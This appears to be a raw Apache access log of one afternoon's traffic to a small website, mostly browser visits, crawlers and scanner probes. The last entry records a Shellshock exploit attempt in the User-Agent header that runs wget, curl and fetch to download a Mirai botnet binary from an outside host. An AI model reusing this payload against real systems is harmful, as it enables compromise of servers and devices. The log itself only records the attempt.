195.226.111.194 - - [04/Jan/2018:15:27:53 +0100] "GET /favicon.ico HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
139.162.114.70 - - [04/Jan/2018:15:50:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
94.102.49.190 - - [04/Jan/2018:16:02:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
94.102.49.190 - - [04/Jan/2018:16:02:40 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
94.102.49.190 - - [04/Jan/2018:16:02:42 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
94.102.49.190 - - [04/Jan/2018:16:02:45 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "python-requests/2.10.0"
204.13.201.137 - - [04/Jan/2018:16:06:42 +0100] "GET / HTTP/1.1" 200 1229 "http://www.bing.com" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
50.19.154.226 - - [04/Jan/2018:16:08:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
50.112.194.65 - - [04/Jan/2018:16:09:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
162.247.72.216 - - [04/Jan/2018:16:27:04 +0100] "GET / HTTP/1.1" 200 1229 "http://www.friedrich-list-berlin.de/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
77.247.181.162 - - [04/Jan/2018:16:28:49 +0100] "GET / HTTP/1.1" 200 1229 "http://www.friedrich-list-berlin.de/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
104.236.46.56 - - [04/Jan/2018:16:35:14 +0100] "GET /robots.txt HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )"
104.236.46.56 - - [04/Jan/2018:16:35:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )"
80.82.77.139 - - [04/Jan/2018:16:56:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
80.82.77.139 - - [04/Jan/2018:16:56:10 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
80.82.77.139 - - [04/Jan/2018:16:56:11 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
80.82.77.139 - - [04/Jan/2018:16:56:13 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "python-requests/2.13.0"
183.129.160.229 - - [04/Jan/2018:17:06:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.129.160.229 - - [04/Jan/2018:17:06:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.129.160.229 - - [04/Jan/2018:17:07:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.129.160.229 - - [04/Jan/2018:17:08:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.129.160.229 - - [04/Jan/2018:17:08:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.129.160.229 - - [04/Jan/2018:17:08:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.129.160.229 - - [04/Jan/2018:17:08:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
45.55.244.197 - - [04/Jan/2018:17:22:05 +0100] "HEAD /spicons/apache_pb.gif HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
104.131.15.102 - - [04/Jan/2018:17:28:03 +0100] "HEAD /spicons/apache_pb.gif HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
162.214.29.130 - - [04/Jan/2018:17:56:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "() { :; }; /bin/sh -c 'wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;wget1 http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;curl http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -o /dev/null;/usr/sfwbin/wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin;fetch -/dev/null http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin'"
